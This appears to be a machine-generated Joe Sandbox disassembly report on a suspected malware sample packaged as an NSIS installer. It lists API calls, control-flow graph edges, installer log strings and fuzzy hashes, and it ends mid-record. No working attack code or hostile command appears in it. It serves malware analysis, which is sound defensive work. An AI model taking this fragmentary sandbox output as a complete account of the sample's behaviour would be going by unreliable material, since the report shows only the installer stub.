4016dd-4016fd call 401446 174->184 175->160 219 4030de call 405f51 175->219 244 4018c2-4018d6 call 4062a3 176->244 245 4018a9-4018bd call 4062a3 176->245 272 401912-401919 177->272 273 40191e-401921 177->273 178->186 187 401647-40164e PostQuitMessage 178->187 179->160 183->160 184->160 186->185 187->186 189->190 190->160 208 401765-401769 ShowWindow 190->208 208->160 217->160 219->160 228 4019af-4019b2 224->228 225->228 235 401986-401989 225->235 228->160 238 4019b8-4019c5 GetShortPathNameW 228->238 235->228 246 40198b-401993 call 4062d5 235->246 238->160 259 4017ab-4017ac 242->259 243->160 244->185 245->185 246->224 269 401995-4019a1 call 406009 246->269 248->160 249->248 259->160 267 401890-401892 264->267 268 40186e-40188b call 404f72 call 406009 SetCurrentDirectoryW 264->268 277 401846-40184e call 4062a3 265->277 278 4017fe-401809 GetLastError 265->278 267->243 268->160 269->228 272->243 279 401923-40192b call 4062d5 273->279 280 40194a-401950 273->280 292 401853-401854 277->292 283 401827-401832 GetFileAttributesW 278->283 284 40180b-401825 GetLastError call 4062a3 278->284 279->280 298 40192d-401948 call 406c68 call 404f72 279->298 288 401957-40195d call 4062a3 280->288 290 401834-401844 call 4062a3 283->290 291 401855-40185e 283->291 284->291 288->259 290->292 291->264 291->265 292->291 298->288
                                                      APIs
                                                      • PostQuitMessage.USER32(00000000), ref: 00401648
                                                      • Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
                                                      • SetForegroundWindow.USER32(?), ref: 004016CB
                                                      • ShowWindow.USER32(?), ref: 00401753
                                                      • ShowWindow.USER32(?), ref: 00401767
                                                      • SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
                                                      • CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
                                                      • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
                                                      • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
                                                      • GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
                                                      • SetCurrentDirectoryW.KERNELBASE(?,004CB0B0,?,000000E6,0040F0D0,?,?,?,000000F0,?,000000F0), ref: 00401885
                                                      • MoveFileW.KERNEL32(00000000,?), ref: 00401908
                                                      • GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,0040F0D0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
                                                      • GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
                                                      • SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE
                                                      Strings
                                                      • Rename on reboot: %s, xrefs: 00401943
                                                      • CreateDirectory: "%s" created, xrefs: 00401849
                                                      • Sleep(%d), xrefs: 0040169D
                                                      • CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
                                                      • CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
                                                      • SetFileAttributes: "%s":%08X, xrefs: 0040177B
                                                      • detailprint: %s, xrefs: 00401679
                                                      • Call: %d, xrefs: 0040165A
                                                      • Rename failed: %s, xrefs: 0040194B
                                                      • IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
                                                      • CreateDirectory: "%s" (%d), xrefs: 004017BF
                                                      • BringToFront, xrefs: 004016BD
                                                      • IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
                                                      • Rename: %s, xrefs: 004018F8
                                                      • Jump: %d, xrefs: 00401602
                                                      • Aborting: "%s", xrefs: 0040161D
                                                      • SetFileAttributes failed., xrefs: 004017A1
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2162625362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2162599547.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162648055.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162761940.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_scan_doc_zapit_836893.jbxd
                                                      Similarity
                                                      • API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
                                                      • String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
                                                      • API String ID: 2872004960-3619442763
                                                      • Opcode ID: e7226c198396c3fe3a7f3bea8c4d52a2e846d2bb9e79691e18455936b93e1c7d
                                                      • Instruction ID: b6b48939bc8a7188504c618ab7841b31fdd5898bf24c808f75461ec369738802
                                                      • Opcode Fuzzy Hash: e7226c198396c3fe3a7f3bea8c4d52a2e846d2bb9e79691e18455936b93e1c7d
                                                      • Instruction Fuzzy Hash: 0AB1F471A00204ABDB10BF61DD46DAE3B69EF44314B21817FF946B21E1DA7D4E40CAAE

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 426 40592c-405944 call 4062fc 429 405946-405956 call 405f51 426->429 430 405958-405990 call 405ed3 426->430 438 4059b3-4059dc call 403e95 call 40677e 429->438 435 405992-4059a3 call 405ed3 430->435 436 4059a8-4059ae lstrcatW 430->436 435->436 436->438 444 405a70-405a78 call 40677e 438->444 445 4059e2-4059e7 438->445 451 405a86-405a8d 444->451 452 405a7a-405a81 call 406805 444->452 445->444 446 4059ed-405a15 call 405ed3 445->446 446->444 453 405a17-405a1b 446->453 455 405aa6-405acb LoadImageW 451->455 456 405a8f-405a95 451->456 452->451 460 405a1d-405a2c call 405d06 453->460 461 405a2f-405a3b lstrlenW 453->461 458 405ad1-405b13 RegisterClassW 455->458 459 405b66-405b6e call 40141d 455->459 456->455 457 405a97-405a9c call 403e74 456->457 457->455 465 405c35 458->465 466 405b19-405b61 SystemParametersInfoW CreateWindowExW 458->466 478 405b70-405b73 459->478 479 405b78-405b83 call 403e95 459->479 460->461 462 405a63-405a6b call 406722 call 406009 461->462 463 405a3d-405a4b lstrcmpiW 461->463 462->444 463->462 470 405a4d-405a57 GetFileAttributesW 463->470 469 405c37-405c3e 465->469 466->459 475 405a59-405a5b 470->475 476 405a5d-405a5e call 406751 470->476 475->462 475->476 476->462 478->469 484 405b89-405ba6 ShowWindow LoadLibraryW 479->484 485 405c0c-405c0d call 405047 479->485 487 405ba8-405bad LoadLibraryW 484->487 488 405baf-405bc1 GetClassInfoW 484->488 491 405c12-405c14 485->491 487->488 489 405bc3-405bd3 GetClassInfoW RegisterClassW 488->489 490 405bd9-405bfc DialogBoxParamW call 40141d 488->490 489->490 495 405c01-405c0a call 403c68 490->495 493 405c16-405c1c 491->493 494 405c2e-405c30 call 40141d 491->494 493->478 496 405c22-405c29 call 40141d 493->496 494->465 495->469 496->478
                                                      APIs
                                                        • Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                                        • Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                                        • Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327
                                                      • lstrcatW.KERNEL32(004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006,004C30A0,-00000002,00000000,004D70C8,00403AC1,?), ref: 004059AE
                                                      • lstrlenW.KERNEL32(00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006,004C30A0), ref: 00405A30
                                                      • lstrcmpiW.KERNEL32(00462538,.exe,00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000), ref: 00405A43
                                                      • GetFileAttributesW.KERNEL32(00462540), ref: 00405A4E
                                                        • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                                      • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004C70A8), ref: 00405AB7
                                                      • RegisterClassW.USER32(0046AD60), ref: 00405B0A
                                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B22
                                                      • CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B5B
                                                        • Part of subcall function 00403E95: SetWindowTextW.USER32(00000000,0046ADC0), ref: 00403F30
                                                      • ShowWindow.USER32(00000005,00000000), ref: 00405B91
                                                      • LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BA2
                                                      • LoadLibraryW.KERNEL32(RichEd32), ref: 00405BAD
                                                      • GetClassInfoW.USER32(00000000,RichEdit20A,0046AD60), ref: 00405BBD
                                                      • GetClassInfoW.USER32(00000000,RichEdit,0046AD60), ref: 00405BCA
                                                      • RegisterClassW.USER32(0046AD60), ref: 00405BD3
                                                      • DialogBoxParamW.USER32(?,00000000,00405479,00000000), ref: 00405BF2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2162625362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2162599547.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162648055.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162761940.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_scan_doc_zapit_836893.jbxd
                                                      Similarity
                                                      • API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
                                                      • String ID: .DEFAULT\Control Panel\International$.exe$@%F$@rD$B%F$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                      • API String ID: 608394941-1650083594
                                                      • Opcode ID: 18be7924d3bcca259bbbf180237d25193f30e5c9112311b2c349bb590eb249de
                                                      • Instruction ID: 271ce27004ef92612bfc9362a6cc74883a37054a4c8cca7c49d128c059fded9a
                                                      • Opcode Fuzzy Hash: 18be7924d3bcca259bbbf180237d25193f30e5c9112311b2c349bb590eb249de
                                                      • Instruction Fuzzy Hash: 5E71A370604B04AED721AB65EE85F2736ACEB44749F00053FF945B22E2D7B89D418F6E

                                                      Control-flow Graph

                                                      APIs
                                                        • Part of subcall function 004062A3: lstrlenW.KERNEL32(Sleep(4921),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                        • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                      • lstrcatW.KERNEL32(00000000,00000000,141,004CB0B0,00000000,00000000), ref: 00401A76
                                                      • CompareFileTime.KERNEL32(-00000014,?,141,141,00000000,00000000,141,004CB0B0,00000000,00000000), ref: 00401AA0
                                                        • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                        • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                        • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                        • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                        • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                        • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                        • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                        • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2162625362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2162599547.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162648055.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162761940.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_scan_doc_zapit_836893.jbxd
                                                      Similarity
                                                      • API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
                                                      • String ID: 141$File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"
                                                      • API String ID: 4286501637-2125343181
                                                      • Opcode ID: b6a2df31382c61c88927ef82d5f6ae0aba2303a4f2552ab8741c3bf9876e390d
                                                      • Instruction ID: fe683e2e252f9e2189d7cf48164ff2fe6631720e8c40e43e96375682ff159270
                                                      • Opcode Fuzzy Hash: b6a2df31382c61c88927ef82d5f6ae0aba2303a4f2552ab8741c3bf9876e390d
                                                      • Instruction Fuzzy Hash: 9D510871901114BADF10BBB1CD46EAE3A68DF05369F21413FF416B10D2EB7C5A518AAE

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 587 403587-4035d5 GetTickCount GetModuleFileNameW call 405e50 590 4035e1-40360f call 406009 call 406751 call 406009 GetFileSize 587->590 591 4035d7-4035dc 587->591 599 403615 590->599 600 4036fc-40370a call 4032d2 590->600 592 4037b6-4037ba 591->592 602 40361a-403631 599->602 606 403710-403713 600->606 607 4037c5-4037ca 600->607 604 403633 602->604 605 403635-403637 call 403336 602->605 604->605 611 40363c-40363e 605->611 609 403715-40372d call 403368 call 403336 606->609 610 40373f-403769 GlobalAlloc call 403368 call 40337f 606->610 607->592 609->607 637 403733-403739 609->637 610->607 635 40376b-40377c 610->635 613 403644-40364b 611->613 614 4037bd-4037c4 call 4032d2 611->614 619 4036c7-4036cb 613->619 620 40364d-403661 call 405e0c 613->620 614->607 623 4036d5-4036db 619->623 624 4036cd-4036d4 call 4032d2 619->624 620->623 634 403663-40366a 620->634 631 4036ea-4036f4 623->631 632 4036dd-4036e7 call 407281 623->632 624->623 631->602 636 4036fa 631->636 632->631 634->623 640 40366c-403673 634->640 641 403784-403787 635->641 642 40377e 635->642 636->600 637->607 637->610 640->623 643 403675-40367c 640->643 644 40378a-403792 641->644 642->641 643->623 645 40367e-403685 643->645 644->644 646 403794-4037af SetFilePointer call 405e0c 644->646 645->623 647 403687-4036a7 645->647 650 4037b4 646->650 647->607 649 4036ad-4036b1 647->649 651 4036b3-4036b7 649->651 652 4036b9-4036c1 649->652 650->592 651->636 651->652 652->623 653 4036c3-4036c5 652->653 653->623
                                                      APIs
                                                      • GetTickCount.KERNEL32 ref: 00403598
                                                      • GetModuleFileNameW.KERNEL32(00000000,004DF0D8,00002004,?,?,?,00000000,00403A47,?), ref: 004035B4
                                                        • Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                                        • Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                                      • GetFileSize.KERNEL32(00000000,00000000,004E30E0,00000000,004CF0B8,004CF0B8,004DF0D8,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00403600
                                                      Strings
                                                      • soft, xrefs: 00403675
                                                      • Inst, xrefs: 0040366C
                                                      • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037C5
                                                      • Error launching installer, xrefs: 004035D7
                                                      • Null, xrefs: 0040367E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2162625362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2162599547.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162648055.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162761940.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_scan_doc_zapit_836893.jbxd
                                                      Similarity
                                                      • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                      • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                      • API String ID: 4283519449-527102705
                                                      • Opcode ID: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
                                                      • Instruction ID: 97831ba7e8e922ff386f77eab0e0d18630bd2de4bbb47cca7d976ce2c46b30f6
                                                      • Opcode Fuzzy Hash: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
                                                      • Instruction Fuzzy Hash: 3151D5B1900204AFDB219F65CD85B9E7EB8AB14756F10803FE605B72D1D77D9E808B9C

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 654 40337f-403396 655 403398 654->655 656 40339f-4033a7 654->656 655->656 657 4033a9 656->657 658 4033ae-4033b3 656->658 657->658 659 4033c3-4033d0 call 403336 658->659 660 4033b5-4033be call 403368 658->660 664 4033d2 659->664 665 4033da-4033e1 659->665 660->659 666 4033d4-4033d5 664->666 667 4033e7-403407 GetTickCount call 4072f2 665->667 668 403518-40351a 665->668 669 403539-40353d 666->669 680 403536 667->680 682 40340d-403415 667->682 670 40351c-40351f 668->670 671 40357f-403583 668->671 673 403521 670->673 674 403524-40352d call 403336 670->674 675 403540-403546 671->675 676 403585 671->676 673->674 674->664 689 403533 674->689 678 403548 675->678 679 40354b-403559 call 403336 675->679 676->680 678->679 679->664 691 40355f-403572 WriteFile 679->691 680->669 685 403417 682->685 686 40341a-403428 call 403336 682->686 685->686 686->664 692 40342a-403433 686->692 689->680 693 403511-403513 691->693 694 403574-403577 691->694 695 403439-403456 call 407312 692->695 693->666 694->693 696 403579-40357c 694->696 699 40350a-40350c 695->699 700 40345c-403473 GetTickCount 695->700 696->671 699->666 701 403475-40347d 700->701 702 4034be-4034c2 700->702 703 403485-4034b6 MulDiv wsprintfW call 404f72 701->703 704 40347f-403483 701->704 705 4034c4-4034c7 702->705 706 4034ff-403502 702->706 712 4034bb 703->712 704->702 704->703 709 4034e7-4034ed 705->709 710 4034c9-4034db WriteFile 705->710 706->682 707 403508 706->707 707->680 711 4034f3-4034f7 709->711 710->693 713 4034dd-4034e0 710->713 711->695 715 4034fd 711->715 712->702 713->693 714 4034e2-4034e5 713->714 714->711 715->680
                                                      APIs
                                                      • GetTickCount.KERNEL32 ref: 004033E7
                                                      • GetTickCount.KERNEL32 ref: 00403464
                                                      • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 00403491
                                                      • wsprintfW.USER32 ref: 004034A4
                                                      • WriteFile.KERNELBASE(00000000,00000000,?,7FFFFFFF,00000000), ref: 004034D3
                                                      • WriteFile.KERNEL32(00000000,0041F150,?,00000000,00000000,0041F150,?,000000FF,00000004,00000000,00000000,00000000), ref: 0040356A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2162625362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2162599547.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162648055.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162761940.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_scan_doc_zapit_836893.jbxd
                                                      Similarity
                                                      • API ID: CountFileTickWrite$wsprintf
                                                      • String ID: ... %d%%$P1B$X1C$X1C
                                                      • API String ID: 651206458-1535804072
                                                      • Opcode ID: 44661cc85d05d2ece2df72a1dadfaff530150b4f00ec14a98415859341c8c9fb
                                                      • Instruction ID: 0313947f0097750978ec936bbe46de4fad37e772bc1cb17ec77dd8e30cfa9ece
                                                      • Opcode Fuzzy Hash: 44661cc85d05d2ece2df72a1dadfaff530150b4f00ec14a98415859341c8c9fb
                                                      • Instruction Fuzzy Hash: 88518D71900219ABDF10DF65AE44AAF7BACAB00316F14417BF900B7290DB78DF40CBA9

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 716 404f72-404f85 717 405042-405044 716->717 718 404f8b-404f9e 716->718 719 404fa0-404fa4 call 406805 718->719 720 404fa9-404fb5 lstrlenW 718->720 719->720 722 404fd2-404fd6 720->722 723 404fb7-404fc7 lstrlenW 720->723 726 404fe5-404fe9 722->726 727 404fd8-404fdf SetWindowTextW 722->727 724 405040-405041 723->724 725 404fc9-404fcd lstrcatW 723->725 724->717 725->722 728 404feb-40502d SendMessageW * 3 726->728 729 40502f-405031 726->729 727->726 728->729 729->724 730 405033-405038 729->730 730->724
                                                      APIs
                                                      • lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                      • lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                      • lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                      • SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                      • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                      • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                        • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2162625362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2162599547.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162648055.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162761940.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_scan_doc_zapit_836893.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
                                                      • String ID:
                                                      • API String ID: 2740478559-0
                                                      • Opcode ID: 7bcaf298b14bfcb271399e4538be81cf37b8538d1c197863d88476df1de4366a
                                                      • Instruction ID: 1d640e6b4f0869ec625b39ce8112f9bd6789598538fb42bade37fe3884716a8e
                                                      • Opcode Fuzzy Hash: 7bcaf298b14bfcb271399e4538be81cf37b8538d1c197863d88476df1de4366a
                                                      • Instruction Fuzzy Hash: 3C21B0B1900518BACF119FA5DD84E9EBFB5EF84310F10813AFA04BA291D7798E509F98

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 731 401eb9-401ec4 732 401f24-401f26 731->732 733 401ec6-401ec9 731->733 734 401f53-401f69 GlobalAlloc call 406805 732->734 735 401f28-401f2a 732->735 736 401ed5-401ee3 call 4062a3 733->736 737 401ecb-401ecf 733->737 745 401f6e-401f7b 734->745 739 401f3c-401f4e call 406009 735->739 740 401f2c-401f36 call 4062a3 735->740 748 401ee4-402702 call 406805 736->748 737->733 741 401ed1-401ed3 737->741 751 402387-40238d GlobalFree 739->751 740->739 741->736 747 401ef7-402e50 call 406009 * 3 741->747 750 4030e3-4030f2 745->750 745->751 747->750 763 402708-40270e 748->763 751->750 763->750
                                                      APIs
                                                        • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                      • GlobalFree.KERNEL32(0073AFD0), ref: 00402387
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2162625362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2162599547.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162648055.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162761940.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_scan_doc_zapit_836893.jbxd
                                                      Similarity
                                                      • API ID: FreeGloballstrcpyn
                                                      • String ID: 141$Exch: stack < %d elements$Pop: stack empty
                                                      • API String ID: 1459762280-3970372979
                                                      • Opcode ID: 1ca185eeaafbead47595a1cc0f367f8cfd746e673960b0814e4cdcb04772ee17
                                                      • Instruction ID: ae7cb1f2c63b60d7baa415153617f8c61fd22799b34192a347ea6a0a5f6d971a
                                                      • Opcode Fuzzy Hash: 1ca185eeaafbead47595a1cc0f367f8cfd746e673960b0814e4cdcb04772ee17
                                                      • Instruction Fuzzy Hash: 4721D172601105EBE710EB95DD81A6F77A8EF44318B21003FF542F32D1EB7998118AAD

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 766 402713-40273b call 406009 * 2 771 402746-402749 766->771 772 40273d-402743 call 40145c 766->772 774 402755-402758 771->774 775 40274b-402752 call 40145c 771->775 772->771 776 402764-40278c call 40145c call 4062a3 WritePrivateProfileStringW 774->776 777 40275a-402761 call 40145c 774->777 775->774 777->776
                                                      APIs
                                                        • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                      • WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2162625362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2162599547.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162648055.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
